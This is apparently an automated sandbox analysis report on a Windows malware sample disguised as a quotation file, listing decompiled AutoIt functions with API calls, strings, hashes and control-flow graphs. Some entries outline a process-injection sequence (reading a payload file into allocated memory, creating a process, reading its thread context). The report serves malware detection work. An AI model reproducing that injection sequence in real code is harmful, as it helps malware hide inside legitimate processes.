                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00E036D2
                                                                      • KillTimer.USER32(?,00000001), ref: 00E036FC
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E0371F
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E0372A
                                                                      • CreatePopupMenu.USER32 ref: 00E0373E
                                                                      • PostQuitMessage.USER32(00000000), ref: 00E0374D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated$%
                                                                      • API String ID: 129472671-3835587964
                                                                      • Opcode ID: b7128eba8553bb9eef76c71d58bfe0b88cf497a8eabf9f4cd391ccf4ed3c3f38
                                                                      • Instruction ID: 602225968ae329b23b040c2fe04da0ae2a04bd61e4e9e701cad30c98b4965094
                                                                      • Opcode Fuzzy Hash: b7128eba8553bb9eef76c71d58bfe0b88cf497a8eabf9f4cd391ccf4ed3c3f38
                                                                      • Instruction Fuzzy Hash: 284129B3114505AFDB189F78EC09FBA379DEB44300F54213AF602B62E2C663A9D59761
                                                                      Function 00E03A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E03A50
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00E03A5F
                                                                      • LoadIconW.USER32(00000063), ref: 00E03A76
                                                                      • LoadIconW.USER32(000000A4), ref: 00E03A88
                                                                      • LoadIconW.USER32(000000A2), ref: 00E03A9A
                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E03AC0
                                                                      • RegisterClassExW.USER32(?), ref: 00E03B16
                                                                        • Part of subcall function 00E03041: GetSysColorBrush.USER32(0000000F), ref: 00E03074
                                                                        • Part of subcall function 00E03041: RegisterClassExW.USER32(00000030), ref: 00E0309E
                                                                        • Part of subcall function 00E03041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                                                                        • Part of subcall function 00E03041: InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                                                                        • Part of subcall function 00E03041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                                                                        • Part of subcall function 00E03041: LoadIconW.USER32(000000A9), ref: 00E030F2
                                                                        • Part of subcall function 00E03041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: f285c4fd5a84b203cb0077174a557afb8e84355d7cfcd30d1ee95618bb6c7cbd
                                                                      • Instruction ID: 69aebdeae87edde557c1db1b2043f16f242cb6d26c60082a7e74f32312b37622
                                                                      • Opcode Fuzzy Hash: f285c4fd5a84b203cb0077174a557afb8e84355d7cfcd30d1ee95618bb6c7cbd
                                                                      • Instruction Fuzzy Hash: 4121F572910308AFEB14DFA6EC49B9D7BF4EB08711F10012AF504B62B1D7B666998F94
                                                                      Function 00E03766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R
                                                                      • API String ID: 1825951767-347772802
                                                                      • Opcode ID: ad9f91ec9c3a7a285f02077735a2d81ad615b8ce2cdcbd4b47340b596b01c132
                                                                      • Instruction ID: 192eb85c1968730264a4b75eabd22cc378f78f6e27086fff5053705a8a75955f
                                                                      • Opcode Fuzzy Hash: ad9f91ec9c3a7a285f02077735a2d81ad615b8ce2cdcbd4b47340b596b01c132
                                                                      • Instruction Fuzzy Hash: D6A16C7291022D9ACB05EBA0DC95EEEB7B8FF54300F442529F416B71D2DF746A89CB60
                                                                      Function 00E0F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E20193
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E2019B
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E201A6
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E201B1
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E201B9
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E201C1
                                                                        • Part of subcall function 00E160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E0F930), ref: 00E16154
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E0F9CD
                                                                      • OleInitialize.OLE32(00000000), ref: 00E0FA4A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E445C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: <W$\T$%$S
                                                                      • API String ID: 1986988660-191198415
                                                                      • Opcode ID: f4f77fce6977ec5af08dc4ac72aea2b535ae4bbc3b6568ff923f7feb18a40fdd
                                                                      • Instruction ID: a66109b996b1257448f377e2d8c33e3ce25e792e097450120c235c9dafb826fe
                                                                      • Opcode Fuzzy Hash: f4f77fce6977ec5af08dc4ac72aea2b535ae4bbc3b6568ff923f7feb18a40fdd
                                                                      • Instruction Fuzzy Hash: 6681CFB2905B40CFC388DF2AA941E597BE5FB98306750913ED02AF7261E77264CB8F11
                                                                      Function 0104FE68 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 985 104fe68-104ff16 call 104d898 988 104ff1d-104ff43 call 1050d78 CreateFileW 985->988 991 104ff45 988->991 992 104ff4a-104ff5a 988->992 993 1050095-1050099 991->993 1000 104ff61-104ff7b VirtualAlloc 992->1000 1001 104ff5c 992->1001 994 10500db-10500de 993->994 995 105009b-105009f 993->995 997 10500e1-10500e8 994->997 998 10500a1-10500a4 995->998 999 10500ab-10500af 995->999 1002 105013d-1050152 997->1002 1003 10500ea-10500f5 997->1003 998->999 1004 10500b1-10500bb 999->1004 1005 10500bf-10500c3 999->1005 1006 104ff82-104ff99 ReadFile 1000->1006 1007 104ff7d 1000->1007 1001->993 1010 1050154-105015f VirtualFree 1002->1010 1011 1050162-105016a 1002->1011 1008 10500f7 1003->1008 1009 10500f9-1050105 1003->1009 1004->1005 1012 10500c5-10500cf 1005->1012 1013 10500d3 1005->1013 1014 104ffa0-104ffe0 VirtualAlloc 1006->1014 1015 104ff9b 1006->1015 1007->993 1008->1002 1018 1050107-1050117 1009->1018 1019 1050119-1050125 1009->1019 1010->1011 1012->1013 1013->994 1016 104ffe7-1050002 call 1050fc8 1014->1016 1017 104ffe2 1014->1017 1015->993 1025 105000d-1050017 1016->1025 1017->993 1021 105013b 1018->1021 1022 1050127-1050130 1019->1022 1023 1050132-1050138 1019->1023 1021->997 1022->1021 1023->1021 1026 1050019-1050048 call 1050fc8 1025->1026 1027 105004a-105005e call 1050dd8 1025->1027 1026->1025 1033 1050060 1027->1033 1034 1050062-1050066 1027->1034 1033->993 1035 1050072-1050076 1034->1035 1036 1050068-105006c CloseHandle 1034->1036 1037 1050086-105008f 1035->1037 1038 1050078-1050083 VirtualFree 1035->1038 1036->1035 1037->988 1037->993 1038->1037
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0104FF39
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0105015F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                      • Instruction ID: fb20e079f5b25002e08465d432d559f9c1463a92d13cd69c7eba354080d9d421
                                                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                      • Instruction Fuzzy Hash: 9AA13770E00209EBDB54CFA8C898BEEBBB5FF48304F208599E641BB285D7759A41CF54
                                                                      Function 00E039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1116 e039d5-e03a45 CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E03A03
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E03A24
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00E03A38
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00E03A41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: ad4a961119ebd6bdb1229390d6cbcea1ca6d40ae2a127df0cfbef24d416bd14f
                                                                      • Instruction ID: 0479a126abba4d8ffe7be4fd4c6a95d4f69d7c190c43a64db7690fc4e963f133
                                                                      • Opcode Fuzzy Hash: ad4a961119ebd6bdb1229390d6cbcea1ca6d40ae2a127df0cfbef24d416bd14f
                                                                      • Instruction Fuzzy Hash: 01F0DA725416907EEB355727AC49E6B2EBDD7C6F50B00413EF908B2170C6762896DAB0
                                                                      Function 0104FC48 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1469 104fc48-104fd5e call 104d898 call 104fb38 CreateFileW 1476 104fd65-104fd75 1469->1476 1477 104fd60 1469->1477 1480 104fd77 1476->1480 1481 104fd7c-104fd96 VirtualAlloc 1476->1481 1478 104fe15-104fe1a 1477->1478 1480->1478 1482 104fd98 1481->1482 1483 104fd9a-104fdb1 ReadFile 1481->1483 1482->1478 1484 104fdb5-104fdef call 104fb78 call 104eb38 1483->1484 1485 104fdb3 1483->1485 1490 104fdf1-104fe06 call 104fbc8 1484->1490 1491 104fe0b-104fe13 ExitProcess 1484->1491 1485->1478 1490->1491 1491->1478
                                                                      APIs
                                                                        • Part of subcall function 0104FB38: Sleep.KERNELBASE(000001F4), ref: 0104FB49
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0104FD54
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: OIJPJG66ACFQR
                                                                      • API String ID: 2694422964-2049201534
                                                                      • Opcode ID: 263edb70b1a25ecfc0afb5e7cb0a04efc0b0d527631c1f593d3a8f351db73a97
                                                                      • Instruction ID: 5568fbff7bd5eaf15aa1ec2f5b4db3924e26fcbba35045a9a81274afc15179cd
                                                                      • Opcode Fuzzy Hash: 263edb70b1a25ecfc0afb5e7cb0a04efc0b0d527631c1f593d3a8f351db73a97
                                                                      • Instruction Fuzzy Hash: C751A471D0424ADBEF15DBE8C854BEEBB79AF14300F0041A9E648BB2C1D7B91B45CBA5
                                                                      Function 00E0407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1493 e0407c-e04092 1494 e04098-e040ad call e07a16 1493->1494 1495 e0416f-e04173 1493->1495 1498 e040b3-e040d3 call e07bcc 1494->1498 1499 e3d3c8-e3d3d7 LoadStringW 1494->1499 1502 e3d3e2-e3d3fa call e07b2e call e06fe3 1498->1502 1503 e040d9-e040dd 1498->1503 1499->1502 1513 e040ed-e0416a call e22de0 call e0454e call e22dbc Shell_NotifyIconW call e05904 1502->1513 1514 e3d400-e3d41e call e07cab call e06fe3 call e07cab 1502->1514 1505 e040e3-e040e8 call e07b2e 1503->1505 1506 e04174-e0417d call e08047 1503->1506 1505->1513 1506->1513 1513->1495 1514->1513
                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E3D3D7
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      • _memset.LIBCMT ref: 00E040FC
                                                                      • _wcscpy.LIBCMT ref: 00E04150
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E04160
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                      • String ID: Line:
                                                                      • API String ID: 3942752672-1585850449
                                                                      • Opcode ID: ba16d56a970d4fd990245f47c40ba6bf1e2994cc6e71eacc32ba6ef2a587b1e7
                                                                      • Instruction ID: 7667f7aa47d475aec4423dce2dd39a6733844637f5074891fccf7eed7b647a49
                                                                      • Opcode Fuzzy Hash: ba16d56a970d4fd990245f47c40ba6bf1e2994cc6e71eacc32ba6ef2a587b1e7
                                                                      • Instruction Fuzzy Hash: D731B2B2408305AED324EB60DC45FDB77E8AF54304F10652EF685B20E1DB70A6C9CB92
                                                                      Function 00E0686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E04DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04E0F
                                                                      • _free.LIBCMT ref: 00E3E263
                                                                      • _free.LIBCMT ref: 00E3E2AA
                                                                        • Part of subcall function 00E06A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E06BAD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                      • API String ID: 2861923089-1757145024
                                                                      • Opcode ID: 4f0435e347cd2a7c249fabaf28b6c8f5579f657c4003c80ad0bc90c8caa7006b
                                                                      • Instruction ID: 1dc4c04619a657bcc2c1f38d24b30a796b34310601bbb0e361237ee990f05eda
                                                                      • Opcode Fuzzy Hash: 4f0435e347cd2a7c249fabaf28b6c8f5579f657c4003c80ad0bc90c8caa7006b
                                                                      • Instruction Fuzzy Hash: 14916C71910219AFCF08EFA4DC959EEBBB8FF04314F10642AE815BB2E1DB70A955CB50
                                                                      Function 00E035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E035A1,SwapMouseButtons,00000004,?), ref: 00E035D4
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E035A1,SwapMouseButtons,00000004,?,?,?,?,00E02754), ref: 00E035F5
                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00E035A1,SwapMouseButtons,00000004,?,?,?,?,00E02754), ref: 00E03617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: a52133278c297e70007e502c9e9a6a06f44d8edc1a97b3d846124192c60d125a
                                                                      • Instruction ID: c9434271407363e0fde87fcafb8e679271f678304c5e6708ed28de990b04d98d
                                                                      • Opcode Fuzzy Hash: a52133278c297e70007e502c9e9a6a06f44d8edc1a97b3d846124192c60d125a
                                                                      • Instruction Fuzzy Hash: 4F114871510208BFDB20CF65EC409EEB7BCEF14744F1054A9E809E7250D6729E849760
                                                                      Function 0104EB38 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0104F2F3
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0104F389
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0104F3AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                      • Instruction ID: f4073bcd0879659508fbd8997765c58f4f5ec87a71b9db8f7ea9bd910394efe9
                                                                      • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                      • Instruction Fuzzy Hash: 12621C70A14219DBEB24CFA8C850BDEB772FF58300F1091A9D14DEB2A4E7759E81CB59
                                                                      Function 00E6955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E04EE5: _fseek.LIBCMT ref: 00E04EFD
                                                                        • Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69824
                                                                        • Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69837
                                                                      • _free.LIBCMT ref: 00E696A2
                                                                      • _free.LIBCMT ref: 00E696A9
                                                                      • _free.LIBCMT ref: 00E69714
                                                                        • Part of subcall function 00E22D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00E29A24), ref: 00E22D69
                                                                        • Part of subcall function 00E22D55: GetLastError.KERNEL32(00000000,?,00E29A24), ref: 00E22D7B
                                                                      • _free.LIBCMT ref: 00E6971C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                      • String ID:
                                                                      • API String ID: 1552873950-0
                                                                      • Opcode ID: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                                      • Instruction ID: 44dfca6dc25fa1f38ef9ce382799c4e584f3c8112b9c323177094e31bdc8dccb
                                                                      • Opcode Fuzzy Hash: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                                      • Instruction Fuzzy Hash: 88514CF1904219ABDF259FA4DC81A9EBBB9EF48300F10549EF209B7281DB715A90CF58
                                                                      Function 00E2470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                      • String ID:
                                                                      • API String ID: 2782032738-0
                                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction ID: ba661823098bbd3f6f353be9af080e2816af7f7338e9528758d843e406acaac0
                                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction Fuzzy Hash: 9241D7B5B007659BDB1CCF69E8809AE7BA5EF45364B24913EF825E76C0DB70DD408B40
                                                                      Function 00E044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E044CF
                                                                        • Part of subcall function 00E0407C: _memset.LIBCMT ref: 00E040FC
                                                                        • Part of subcall function 00E0407C: _wcscpy.LIBCMT ref: 00E04150
